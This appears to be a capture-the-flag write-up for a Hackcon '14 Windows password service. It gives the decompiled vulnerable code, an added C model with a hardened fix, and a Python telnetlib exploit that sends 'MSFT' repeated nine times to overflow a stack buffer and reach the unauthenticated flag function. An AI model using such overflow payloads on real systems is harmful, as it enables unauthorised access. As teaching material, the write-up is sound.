Hackcon ’14 binary services

Service 1

We lately (just 2 hours before the contest was about to end) figured out that there were 3 binary services running on the server. And we were able to exploit it just before the contest ended.

This is the link to the binary file:

After decompiling the binary, we were able to figure out the theory behind the exploit. But as the “raw” socket service was running on a Windows server, it took us a long time to figure out “how to exploit” it.

  char Str2;                   // 1-byte buffer; recv() below writes up to 36 bytes into it
  int v13;                     // sits above Str2 on the stack, so the overflow lands here
  int v14;
  int v15;

  Str2 = 0;
  v14 = send(s, "Please enter your password: ", 28, 0);
  if ( v14 == -1 )
  {
    v1 = WSAGetLastError();
    printf("send failed with error %d\n", v1);
  }
  v15 = recv(s, &Str2, 36, 0);   // 36 bytes into a 1-byte variable: stack overflow
  if ( v15 > 0 && v15 < 512 )    // always true for 1..36 received bytes
  {
    if ( v13 == 'TFSM' )         // decided by attacker-supplied bytes; 'TFSM' is "MSFT" in memory
      read_flag(s);              // prints the flag without checking any password
    else
      read_flag_2(s, &Str2, 32); // the path that actually checks the password
  }

Telnet, Python sockets etc. didn’t work. And finally one of the admins published a hint that PuTTY would be a good choice to exploit it. Python telnetlib worked for us finally.
The POC: Our goal is to get control to the function read_flag(), which doesn’t check the password we pass. Str2 is only 1 byte, but recv() accepts up to 36 bytes into it, and v15, v14 and v13 sit on top of Str2 on the stack. So we need to overflow Str2 and fill v13 with TFSM.
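To make the bug and its fix concrete, here is an added C example (not code from the write-up or the challenge binary) that models the decompiled frame above: a byte array in which Str2 is at offset 0 and v13 4 bytes above it (that layout is an assumption; real layouts are compiler-dependent), a fake_recv() that reads from a constructed in-memory "wire" instead of a socket, the vulnerable decision as decompiled, and a hardened handler that bounds recv() by the buffer size, decides only from the received password, and compares it in constant time.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the decompiled frame (the layout is an assumption): recv()
 * writes from Str2 at offset 0, and v13, the int the handler trusts, is 4 bytes above. */
enum { STR2_OFF = 0, V13_OFF = 4, FRAME_LEN = 36 };

/* 'TFSM' as an MSVC multi-character constant is 0x5446534D; on little-endian x86 those
 * four bytes appear in memory as "MSFT", so the in-memory compare is against these. */
static const unsigned char MAGIC_BYTES[4] = { 'M', 'S', 'F', 'T' };

/* Stand-in for recv(): copies up to n bytes from a constructed in-memory "wire". */
static int fake_recv(const unsigned char *wire, size_t wire_len, void *dst, size_t n) {
    size_t take = wire_len < n ? wire_len : n;
    memcpy(dst, wire, take);
    return (int)take;
}

/* Vulnerable handler, as decompiled: recv() may write 36 bytes starting at the 1-byte
 * Str2, and the branch to read_flag() is decided by v13, which those bytes overwrite.
 * Returns 1 when the unauthenticated read_flag() path would be taken. */
int vulnerable_handler(const unsigned char *wire, size_t wire_len) {
    unsigned char frame[FRAME_LEN];
    memset(frame, 0, sizeof frame);
    int v15 = fake_recv(wire, wire_len, frame + STR2_OFF, 36);
    if (v15 > 0 && v15 < 512 && memcmp(frame + V13_OFF, MAGIC_BYTES, 4) == 0)
        return 1;   /* read_flag(): password never checked */
    return 0;       /* read_flag_2(): password checked */
}

/* Hardened handler: recv() is bounded by the buffer, no stack variable doubles as an
 * "authenticated" flag, and the compare is constant-time. Returns 1 on a correct password. */
int hardened_handler(const unsigned char *wire, size_t wire_len, const char *expected) {
    unsigned char pw[32];
    int n = fake_recv(wire, wire_len, pw, sizeof pw);   /* never more than sizeof pw */
    size_t elen = strlen(expected);
    if (n <= 0 || (size_t)n != elen)
        return 0;
    unsigned char diff = 0;
    for (size_t i = 0; i < elen; i++)
        diff |= (unsigned char)(pw[i] ^ (unsigned char)expected[i]);
    return diff == 0;
}

int main(void) {
    /* Constructed inputs: the 36-byte pattern from the write-up and an ordinary password. */
    unsigned char pattern[36];
    for (int i = 0; i < 36; i++)
        pattern[i] = (unsigned char)"MSFT"[i % 4];
    const unsigned char *pw = (const unsigned char *)"secret";

    printf("vulnerable, 36-byte pattern : %d\n", vulnerable_handler(pattern, 36));
    printf("vulnerable, plain password  : %d\n", vulnerable_handler(pw, 6));
    printf("hardened, 36-byte pattern   : %d\n", hardened_handler(pattern, 36, "secret"));
    printf("hardened, correct password  : %d\n", hardened_handler(pw, 6, "secret"));
    return 0;
}
```

The two defects are independent: even with a bounded recv(), letting an uninitialised stack int decide between read_flag() and read_flag_2() would still be wrong, so the hardened version removes that decision entirely rather than just shrinking the read.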
Exploit:

import telnetlib

attack_ip = '127.0.0.1'          # host running the password service
port = 37517
exploit = b"MSFT" * 9            # 36 bytes: fills the recv() buffer so v13 reads as 'TFSM'

con = telnetlib.Telnet(attack_ip, port)
con.read_until(b':')             # wait for "Please enter your password:"
con.write(exploit + b"\n")
print(con.read_all())            # the flag returned by read_flag()

Which would print the flag like this:

adjfgasdjkfgaskjdfgjkasdhgfhkajs

Hence we lost $500*N*T points (N = number of times flags were planted on our vuln machine, T = total no. of teams - 1) by not solving this on time.

Service 2

(will be updated soon)
